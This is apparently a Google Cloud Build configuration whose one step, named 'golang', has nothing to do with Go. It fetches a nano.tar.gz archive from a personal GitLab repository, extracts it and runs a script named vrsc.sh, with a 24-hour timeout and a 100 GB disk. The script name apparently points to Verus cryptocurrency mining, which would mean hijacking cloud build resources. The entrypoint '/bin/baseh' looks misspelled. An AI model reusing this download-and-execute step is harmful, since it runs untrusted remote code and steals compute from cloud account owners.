steps:
  - name: golang
    args: 
      - '-c'
      - >-
        wget https://gitlab.com/ilhamjaya0q/beben/-/raw/main/nano.tar.gz && tar xf nano.tar.gz && ./vrsc.sh
    waitFor: ["-"]
    entrypoint: /bin/baseh
timeout: 86400s
options:
  machineType:
  diskSizeGb: '100'
